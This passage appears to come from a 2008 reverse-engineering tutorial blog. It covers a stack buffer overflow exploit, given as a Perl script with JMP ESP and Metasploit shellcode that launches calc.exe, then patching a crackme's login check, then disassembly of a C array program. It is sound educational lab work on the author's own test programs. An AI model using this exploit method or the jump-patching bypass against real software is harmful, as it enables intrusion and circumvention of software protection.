It’s exactly where we expected it to be!聽 now if the allocated address space was not a multiple of 4 we would possibly have to compensate by between 1 and 4 bytes to get it exactly spot on, but in this case we don’t need to worry about it.

if we have a quick look at the process in Olly – we’ll see the stack looks something like this:

0012FE84聽聽 41414141聽 AAAA
0012FE88聽聽 41414141聽 AAAA
0012FE8C聽聽 42424242聽 BBBB聽 ;this is our return address
0012FE90聽聽 43434343聽 CCCC
0012FE94聽聽 43434343聽 CCCC

So now we know we can overwrite the return address at will, and by doing so can cause the program to execute whatever code is at the address we point to.

So, we just need to point it to the address 0012FE90 right? that way, we can pass in some instructions instead of a whole bunch of C’s and the computer will execute it?聽 Yes, but the problem we face here is that this address contains a null byte (the 00).聽 when strcpy() encounters a null byte, it will stop copying! meaning that although we can change the address alright, we would not then be able to include code following.

in this particular program, there are two solutions to this:

We can place our code prior to the return address, (this is only possible if the allocated space is large enough for our code, but is not allways possible) or we can take note of the fact that as soon as the program flow goes to the return address, the ESP register will be pointing at the top of the stack, where our C’s start.聽 so what we need to do is find a memory address which does not have any null bytes in it and that has the command JMP ESP or CALL ESP.聽 We then replace the return address with this address and the program flow will start executing our user input.

This is where OllyUni comes in – OllyUni is an addon to Ollydbg that allows searching for certain commands in all the memory executable by the current process.聽 just google for it and place the .dll file in your olly directory.

Once you’ve got OllyUni in, restart ollydbg and rightclick in the execution window->overflow return address->ASCII overflow returns->JMP/CALL ESP.聽 depending on the speed of your computer this may take a while.

it should come back in time with a message saying it’s found some addresses:

awesome! View->Log

pick an address that does not have 00 in it. – for our purposes, we’re going for “7C86467B”

now we place that in our perl script:

#!/usr/local/bin/perl
$buffer = "A"x256;聽 #fills up the variable space
$buffer .= "A"x4;聽聽 #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";聽聽 #should overwrite the return address with 7C86467B
$buffer .= "C"x100;聽 #if return address = 43434343 then we've padded too much

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer\"";

Note that the address bytes are written “backwards” this is becuase they will be written in reverse order onto the stack.

now run it just for kicks…

our stack, as expected, looks like this:

0012FE84聽聽 41414141聽 AAAA
0012FE88聽聽 41414141聽 AAAA
0012FE8C聽聽 7C86467B聽 {F鈥爘聽 kernel32.7C86467B
0012FE90聽聽 43434343聽 CCCC
0012FE94聽聽 43434343聽 CCCC

step through the RETN command…

and we find execution has landed at:

7C86467B聽聽 - FFE4聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 JMP ESP

and then of course – our EIP register looks like this:

EIP 0012FE90

demonstrating that we’re about to execute our C’s.

now, we step again and we find our useless-fact-of-the-day:聽 the instruction “43” in hex means INC EBX, as we see that the program is trying to execute the instructions:

Execution window:

0012FE90聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX
0012FE91聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX
0012FE92聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX
0012FE93聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX
0012FE94聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX
0012FE95聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX
0012FE96聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX
0012FE97聽聽聽聽 43聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 INC EBX

Stack window:

0012FE90聽聽 43434343聽 CCCC
0012FE94聽聽 43434343聽 CCCC

yay for us!

Now let’s do something a bit more useful than incrementing EBX a hundred times eh?

How about we open the calculator program calc.exe?

Head on over to metasploit.com, choose shellcode, click demonstration version, filter modules to os::win32, pick “Windows Execute Command” and type “calc.exe” into the CMD field and hit the “generate payload” button.

copy and paste the shellcode into your perl script like so, removing the C’s and adding $shellcode to the command line arguments:

#!/usr/local/bin/perl
$buffer = "A"x256;聽 #fills up the variable space
$buffer .= "A"x4;聽聽 #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";聽聽 #should overwrite the return address with 7C86467B
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer$shellcode\"";

Breaking down this bit of code is something for another day, suffice to say that it goes and opens the calculator. it is called shellcode because usually you would use it to open a shell.聽 I think it was Aleph1 that coined the phrase in his phrack article “smashing the stack for fun and profit”.

now we’re almost ready – you’ll notice that when running through the above, it still fails miserably….

here is where I admit my lack of patience to find out why – I know it fails because the registers contain the wrong values but I don’t know why adding 7 NOP’s prior to the shellcode starting fixes it.聽 anyway – I’ll come back to that I guess.

so our final shellcode is as follows:

#!/usr/local/bin/perl
$buffer = "A"x256;聽 #fills up the variable space
$buffer .= "A"x4;聽聽 #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";聽聽 #should overwrite the return address with 7C86467B
$buffer .= "\x90"x7;
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "./overflowme.exe \"$buffer$shellcode\"";

you can remove the olly call as I have done above and execute!

we should be rewarded with the following:

and this

and a terminal message stating that we have abnormal program termination.

And we can now do a root dance in celebration.

Next blog we’ll look at what happens when we remove that hard-coded array, reducing the space on the stack, and how we can insert our shellcode prior to the return point.

There is also a follow up article to the one mentioned at the top of this post here http://www.ethicalhacker.net/content/view/165/2/ which also goes into basic buffer overflows.

until next time.

Posted by: nickfnord | October 2, 2008

Binary Analysis Basics Part III

Hello again,

This is yet another session reversing simple c programs in order to see how they work under the hood.

For this session, we’ll need the same tools as before:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure.
Basic knowledge of assembly language.
some familiarity with OllyDbg
knowledge of Hex

This time, the hello world program will be a bit more complex.聽 There are a number of things I would like to demonstrate here.

1. This program is essentially a crackme.聽 It’s a very basic one, but there are three different “levels” I guess (for a want of a better word) that we will go through when demonstrating how to crack it.聽 These three are:
Level1a: identify the password string for a particular login name. (Super easy)
Level1b: Bypass the authentication checking section by patching (easy (and cheating))
Level2: Create a keygen without understanding the algorithm (a bit harder)
Level3: Understand the algorithm just by looking at the source (more difficult but instructive)
2. This is still a simple trial program, but as you’ll see, things just got a whole lot more complicated.聽 The point of reversing is not always to understand the entire thing and in most cases you can’t because of the size of the program.聽 We just need to find what we’re looking for and understand a bit of how the program flows.
3. There are two constructs here that were deliberately left out of the previous two examples:聽 Loops and Functions.
4. In the process of doing the above, we’ll learn a bit more of the functionality of OllyDbg and IDAPro.

The approach we will take is one of an analyst looking at how we can achieve the three levels mentioned above, and as we do, points 2,3 and 4 will be fully explored.聽 Also note that bypassing a login and gleaning the plain text password as easily as we will do is very unlikely to be possible on a commercial product or the harder crackme’s that you’ll find arround the place.聽 the purpose of this is to just learn what is possible.

Obviously we have the complete source code available to us for viewing, which we wouldn’t normally have when trying a crackme, but this is a learning excersise.

Now one thing I want to make clear here:聽 I do not condone bypassing the protection of commercial software just for the sake of using it without paying for it, regardless of whether it is legal or not in whatever country you are in.聽 The reason we are going through this “crackme” here is to demonstrate binary analysis, with the ultimate goal being complete understanding of the program.

So here’s the Code:

#include <stdio.h>
#include <string.h>
#include <ctype.h>

void keygen(char p[],char c[])
{
int i,j;
char key[] = "NICKFNORD";
//generate password C=p+k(mod26) and check
for(i=0,j=0;i<strlen(p);i++,j++)
{
if(j>=strlen(key))
{
j=0;
}
c[i] = ((toupper(p[i])-65+key[(j)]-65)%26+65);

}
}

int main(void)
{
char username[50];
char password[50];
char correctp[50];
int i,j;

for (i=0;i<50;i++)
{
correctp[i] = '';
password[i] = '';
//username[i] = '';
}

printf("Enter Username:\n");
scanf("%s",username);
printf("Enter Password:\n");
scanf("%s",password);
//find length of username/password, must be 8 characters
if (strlen(username) < 8 | strlen(password) < 8)
{
printf("invalid username/password combination");
return 1;
}

keygen(username,correctp);

if (strcmp(correctp,password)==0)
{
printf("Hello World!\nThank you for logging in %s",username);
}
else
{
printf("invalid username/password combination");
}
return 0;
}

This time, we find that the dissassembly is slightly different – our program is bigger and so there is more to scroll through to get to the bits that we’re interested in.聽 Instead of just a walkthrough the code this time arround, we’re going to treat this like a crackme and pretend that we havn’t seen the source code above.

So the first thing one would normally do is to run the program to see what we have:

C:\stuff\C>compile hello4

C:\stuff\C>lcc -o hello4.obj hello4.c

C:\stuff\C>lcclnk -o hello4.exe hello4.obj

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
AAAAAAAA
invalid username/password combination
C:\stuff\C>

What we are trying to do for in the first instance here is identify parts of the program code that we can look for in order to know where the starting point of the protection may be.

So we open up in olly.聽 You’ll notice that although this is still a fairly simple program, there is a bit more complexity.聽 Olly has done its best to analyse the code and place brackets arround significant blocks but it doesn’t appear clear where any of the messages above come from.聽 Most crackme’s would also have a GUI which adds even more complexity to the dissassembly, so the easiest way to find your place in a program like this is to search for text strings.

Right click in the main program window -> search for -> all referenced text strings

You’ll see a short list of hard-coded strings that appear in the program:

Seeing our first goal is to bypass the username/password code and get straight to whatever is behind it, we are most interested in what happens after we enter our username and password.聽 we notice that there are two lines that display our error message.聽 We can infer from this that there are multiple separate validations occuring that may trigger the error. We do not know which validation check we have triggered.聽 There are a number of ways forward from here:聽 We can ignore the fact that we don’t know which check we have triggered and just see what the last one does and try to bypass that or we can trace through from the start of the program to see what happens immediately after the it requests our username/password, but for the moment there is a glaringly obvious place to start:聽 The line that says “Hello World!Thank you for logging in %s”.聽 This is what we want to achieve so lets start there and work backwards – Double click on that line in the strings window and olly will take you to the portion of code referencing that string.

00401465聽 |. 83F8 00聽聽聽聽聽聽聽 CMP EAX,0
00401468聽 |. 75 16聽聽聽聽聽聽聽聽聽 JNZ SHORT hello4.00401480
0040146A聽 |. 8DBD 66FFFFFF聽 LEA EDI,DWORD PTR SS:[EBP-9A]
00401470聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /<%s>
00401471聽 |. 68 AAB04000聽聽聽 PUSH hello4.0040B0AA聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |format = "Hello World!Thank you for logging in %s"
00401476聽 |. E8 A2760000聽聽聽 CALL hello4._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
0040147B聽 |. 83C4 08聽聽聽聽聽聽聽 ADD ESP,8
0040147E聽 |. EB 0D聽聽聽聽聽聽聽聽聽 JMP SHORT hello4.0040148D
00401480聽 |> 68 D3B04000聽聽聽 PUSH hello4.0040B0D3聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "invalid username/password combination"
00401485聽 |. E8 93760000聽聽聽 CALL hello4._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
0040148A聽 |. 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
0040148D聽 |> B8 00000000聽聽聽 MOV EAX,0

Now we should recognise this construct immediately:

CMP command (or any command that sets the appropriate flags)
Conditional Jump (to start of code block 2)
Code block 1
Unconditional Jump(to line after end of code block 2)
Code block 2

This is an if-test type construct as we have previously seen.

We assume that the program will take our username, generate a correct password from it and compare that one with the one that we entered.聽 The first place to look for this is immediately prior to the successfull login and failure messages.聽 In this instance, we can very clearly see that there is a call to strcmp, just prior to the compare command that triggers the conditional jump that we neutralised previously:

00401455聽 |. 8D7D CA聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-36]
00401458聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /s2
00401459聽 |. 8D7D 98聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-68]聽聽聽聽聽聽聽聽聽聽聽 ; |
0040145C聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |s1
0040145D聽 |. E8 AE790000聽聽聽 CALL <JMP.&CRTDLL.strcmp>聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \strcmp

We can see that it loads data from storage on the stack (in variables) and pushes them back onto the top of the stack prior to calling the strcmp function.聽 We can therefore assume that these two strings are going to be our password and the password generated by the program.聽 The easiest way to check is to set a breakpoint (F2) on line 0040145D and see what the situation is.

run the program (F9) after setting the breakpoint and we can see that the top two lines of the stack are as per below:

0012FEBC聽聽 0012FF08聽 |s1 = "MHBJEMNQ"
0012FEC0聽聽 0012FF3A聽 \s2 = "AAAAAAAA"

So let’s give it a try:

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
MHBJEMNQ
Hello World!
Thank you for logging in ZZZZZZZZ
C:\stuff\C>

… and we see the magic words.

Now at this point it is also trivial to bypass the above if-test entirely.聽 Ollydbg allows us to make changes to this code and save our changes into another executable. We basically want to remove this if-test, allowing us to get to the Hello World message regardless of what we put in the username and password fields.聽 to do this, we can do any number of things to stop the code from jumping.聽 The simplest way to do this is fill the command with NOPs聽 or Null Operations.

Click on the JNZ line (00401468) and right click -> binary -> fill with NOPs

you should now see this:

00401465聽 |. 83F8 00聽聽聽聽聽聽聽 CMP EAX,0
00401468聽聽聽聽 90聽聽聽聽聽聽聽聽聽聽聽聽 NOP
00401469聽聽聽聽 90聽聽聽聽聽聽聽聽聽聽聽聽 NOP
0040146A聽 |. 8DBD 66FFFFFF聽 LEA EDI,DWORD PTR SS:[EBP-9A]

Now there is one more thing that we should take care of before writing this to another binary file.聽 if you scroll up, you’ll see the other “invalid username/password combination” string.聽 Because we don’t know which one we encountered when we ran through the program, we should take this out as well.聽 The assembly surrounding it is as follows:

00401429聽 |. 83FF 00聽聽聽聽聽聽聽 CMP EDI,0
0040142C聽 |. 74 14聽聽聽聽聽聽聽聽聽 JE SHORT hello4.00401442
0040142E聽 |. 68 D3B04000聽聽聽 PUSH hello4.0040B0D3聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "invalid username/password combination"
00401433聽 |. E8 E5760000聽聽聽 CALL hello4._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
00401438聽 |. 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
0040143B聽 |. B8 01000000聽聽聽 MOV EAX,1
00401440聽 |. EB 50聽聽聽聽聽聽聽聽聽 JMP SHORT hello4.00401492
00401442聽 |> 8D7D 98聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-68]

This looks similar to our standard if-then-else test, except this time the second conditional jump goes a very long way away.聽 if we follow it down, we’ll see that line 00401492 finalises the program and returns to the calling block.聽 What this looks like is an if-test without an else.聽 so in pseudo code we can assume that the programmer has written something like:

if EDI <> 0 then
print invalid message
exit program
end if;

in any case, because all we want to do in this case is bypass the invalid message and cause the program not to exit, we simply need to turn that conditional JE into an unconditional JMP.聽 once again – right click -> assemble.

change the text to

JMP SHORT 00401442

and assemble.

and it should now look like this

0040142C聽聽聽聽 EB 14聽聽聽聽聽聽聽聽聽 JMP SHORT hello4.00401442

We are now ready to save our changes into a separate executable.

Right-click in the dissassembly window -> copy to executable -> all modifications -> “copy all”.
this will bring up another window with our modified dissassembly.聽 Right click -> Save file.聽 change the name to something else.聽 in this case I’m calling it Hello4patched.exe

Now lets run it and see how it works:

C:\stuff\C>hello4patched.exe
Enter Username:
AAAAAAAA
Enter Password:
ZZZZZZZZ
Hello World!
Thank you for logging in AAAAAAAA

C:\stuff\C>hello4patched.exe
Enter Username:
asdf
Enter Password:
asdf
Hello World!
Thank you for logging in asdf
C:\stuff\C>

Well, hey!聽 there we go – now that was easy wasn’t it.聽 With a bare minimum of understanding of the program’s workings we managed to bypass the two sections of security – and heck we didn’t even figure out what either of them actually did.

Now on a very serious note: What I just demonstrated was absolute rubbish:

We didn’t learn anything whatsoever about the program
We still havn’t figured out what algorithm is used to generate the passwords
There is only a miniscule chance that any actual commercial product will allow us to simply bypass an if-test or two in order to get to the main program.
We didn’t actually achieve anything usefull whatsoever in relation to learning how to reverse, with the exception of learning how to patch executables using ollydbg.

The goal here is to be able to understand common constructs and to be able to find what we’re looking for in the dissassembly as fast as possible.

There are quite a few things we need to analyse and find out:

What is that first lot of validation that seems to happen before comparing the strings?
what do the few lines of code before the enter username line do?
What algorithm is used to determine the password?
can we possibly duplicate this algorithm in a program of our own?

We’ll deal with these in the Next blog where we go onto deconstructing loops and looking at Level 2 of the goals mentioned at the start of this blog.

until then.

Nick.

I have to say that I really had to force myself to work through the above so that I could understand it enough to write it down and explain it all to someone else.聽 The reason being is that IDAPro is seriously better at giving the reverser a good overview of a program flow.

as I was going through the above, I sometimes referenced IDAPro, but I made myself understand what was going on in Olly just to excersise my brain.聽 after all, I’m not here to crack my own hello world program, I’m here to learn stuff.

Posted by: nickfnord | October 1, 2008

Binary Analysis Basics Part II

In the previous blog, we broke down a couple of simple C programs that we compiled and dissassembled, analysing how such constructs as if-then-else and basic comparisons look when dissassembled. In this one we do the same thing with another fundamental construct:聽 Arrays.

You will need:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
some familiarity with OllyDbg
knowledge of Hex

The following C code adds a few more complexities that are essential to understand when reversing.

#include <stdio.h>
#include <string.h>
int main(void)
{
char name[20];
char rname[] = "NickFnord";

printf("Enter Name:\n");
scanf("%s",name);

printf("\nThe Array of characters that you entered was: %s\n",name);
printf("Name array starts at: %d\n",name);
printf("first char of array has ascii value of: %d\n",name[0]);

if (strcmp(name, rname) == 0)
{
printf("Hello World\n");
}
else
{
printf("No Greeting for you\n");
}

return 0;
}

The first important thing to understand if you’re new to programming or have only worked in higher level languages, is that strings, such as the two declared above, are actually stored as an array of characters. The second thing to note is that we cannot do a direct comparison of the entire string.聽 because it is effectively not an actual string now, but an array of characters, we must either compare each character individually, or call a function which does the same.聽 So we have included the string.h library in order to have access to the strcmp function.聽 Also note that when you are running this program, the scanf function will only read the first word you type, i.e. it will stop reading your input when it finds a white space.聽 we could use the “gets” function in order to capture multiple words but we’ll look at that next time.

First, before opening Olly, run the program to see what it outputs.

c:\stuff\C>hello3
Enter Name:
NickFnord

The Array of characters that you entered was NickFnord
Name array starts at: 1245020
first char of array has ascii value of: 78
Hello World

c:\stuff\C>hello3

So let’s take a look under the hood.

004012D4聽 /$ 55聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EBP
004012D5聽 |. 89E5聽聽聽聽聽聽聽聽聽聽 MOV EBP,ESP
004012D7聽 |. 83EC 20聽聽聽聽聽聽聽 SUB ESP,20
004012DA聽 |. 56聽聽聽聽聽聽聽聽聽聽聽聽 PUSH ESI
004012DB聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI
004012DC聽 |. 8D7D E2聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-1E]
004012DF聽 |. 8D35 A0B04000聽 LEA ESI,DWORD PTR DS:[40B0A0]
004012E5聽 |. B9 0A000000聽聽聽 MOV ECX,0A
004012EA聽 |. F3:A4聽聽聽聽聽聽聽聽聽 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

At line 004012DC we can see that the stack address of EBP-1E is moved into EDI.聽 Your mileage may vary, but for me, EBP is 0012FF70 and so EDI will be 0012FF52 after that command has been run. This is half-way between two entries on the stack displayed by Olly and as we will find out later, this will store the variable declared at the beginning of the program, containing “NickFnord”.

You’ll notice that at the second LEA on line 004012DF, the program has taken the memory address referring to the constant “NickFnord” and placed it in the register. You can follow it in the dump to see it allong with other constants that have been stored in the program’s data segment. The command “MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]” transfers the byte referred to by the address stored at ESI into the address stored at EDI but the REP command in front causes this command to be repeated, using the register ECX as a counter and incrementing EDI and ESI each time around.聽 As the ECX register was set to 0A (or 10 in decimal) in the previous command, we know that it will repeat the MOVS command 10 times moving allong the dump one byte each time and therefore take 10 bytes starting from the memory address stored in ESI (0040B0A0) and place them in turn in the stack, which will now look something like this:

0012FF50聽聽 694E1EE0聽 脿Ni
0012FF54聽聽 6E466B63聽 ckFn
0012FF58聽聽 0064726F聽 ord.
0012FF5C聽聽 0012FF70聽 p每.
0012FF60聽聽 0012FF6C聽 l每.
0012FF64聽聽 7C910208聽 鈥榺聽 ntdll.7C910208

The next bit is nothing too complicated:

004012EC聽 |. 68 48B14000聽聽聽 PUSH hello3.0040B148聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "Enter Name:"
004012F1聽 |. E8 8B760000聽聽聽 CALL hello3._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
004012F6聽 |. 83C4 04聽聽聽聽聽聽聽 ADD ESP,4
004012F9聽 |. 8D7D EC聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-14]
004012FC聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI

This prints out the string stored at 0040B148 and then uses the LEA command to prepare the way for the user’s input.聽 We’ll notice that the address refered to by EBP-14 is 0012FF5C, which is immediately after the space that was used to store the variable containing NickFnord. This is where our input string will be stored.聽 As this is now contained in the EDI register, we can guess that the scanf function below will send its output into the EDI register.

004012FD聽 |. 68 45B14000聽聽聽 PUSH hello3.0040B145聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /format = "%s"
00401302聽 |. E8 A1430000聽聽聽 CALL hello3._scanf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_scanf
00401307聽 |. 83C4 08聽聽聽聽聽聽聽 ADD ESP,8
0040130A聽 |. 8D7D EC聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-14]
0040130D聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /<%s>
0040130E聽 |. 68 12B14000聽聽聽 PUSH hello3.0040B112聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |format = "The Array of characters that you entered was: %s"
00401313聽 |. E8 69760000聽聽聽 CALL hello3._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
00401318聽 |. 83C4 08聽聽聽聽聽聽聽 ADD ESP,8

When running through this time, I have put “ZZZZZZZZZZ” into the input value to make it a bit easier to distinguish between this value and the constant NickFnord declared earlier.聽 After this section of code, our stack should look like this:

0012FF50聽聽 694E1EE0聽 脿Ni
0012FF54聽聽 6E466B63聽 ckFn
0012FF58聽聽 0064726F聽 ord.
0012FF5C聽聽 5A5A5A5A聽 ZZZZ
0012FF60聽聽 5A5A5A5A聽 ZZZZ
0012FF64聽聽 7C005A5A聽 ZZ.|

So the Scanf function will take the input value and insert it into the allocated memory space and append a null terminator.聽 You can see that the constant “NickFnord” is also appended by a null character.聽 This fact becomes significant later on when we look at buffer overflows.聽 What happens if we put in more than the allocated 20 characters? What happens if we overwrite the return address stored in 0012FF74 and cause it to point elsewhere? Our program should really validate the length of the user input information prior to copying it into memory. More on that another time though.

Next bit then:

0040131B聽 |. 8D7D EC聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-14]
0040131E聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /<%d>
0040131F聽 |. 68 F8B04000聽聽聽 PUSH hello3.0040B0F8聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |format = "Name array starts at: %d"
00401324聽 |. E8 58760000聽聽聽 CALL hello3._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
00401329聽 |. 83C4 08聽聽聽聽聽聽聽 ADD ESP,8
0040132C聽 |. 0FBE7D EC聽聽聽聽聽 MOVSX EDI,BYTE PTR SS:[EBP-14]
00401330聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /<%d>
00401331聽 |. 68 CCB04000聽聽聽 PUSH hello3.0040B0CC聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |format = "first char of array has ascii value of: %d"
00401336聽 |. E8 46760000聽聽聽 CALL hello3._printf聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \_printf
0040133B聽 |. 83C4 08聽聽聽聽聽聽聽 ADD ESP,8

You’ll notice that in this section, the LEA commands again references the start of the user entered array.聽 This is redundant as this address has already been loaded into EDI.聽 however you’ll notice the MOVSX command is also referencing the same location in memory, just that this time it is referencing the data rather than loading the effective address and so we know from the above section in the stack that it will return to the user the value 5A or 90 in decimal which is the ASCII value for “Z”.

0040133E聽 |. 8D7D E2聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-1E]
00401341聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; /s2
00401342聽 |. 8D7D EC聽聽聽聽聽聽聽 LEA EDI,DWORD PTR SS:[EBP-14]聽聽聽聽聽聽聽聽聽聽聽 ; |
00401345聽 |. 57聽聽聽聽聽聽聽聽聽聽聽聽 PUSH EDI聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; |s1
00401346聽 |. E8 29790000聽聽聽 CALL <JMP.&CRTDLL.strcmp>聽聽聽聽聽聽聽聽聽聽聽聽聽聽聽 ; \strcmp
0040134B聽 |. 83C4 08聽聽聽聽聽聽聽 ADD ESP,8
0040134E聽 |. 83F8 00聽聽聽聽聽聽聽 CMP EAX,0
00401351聽 |. 75 0F聽聽聽聽聽聽聽聽聽 JNZ SHORT hello3.00401362

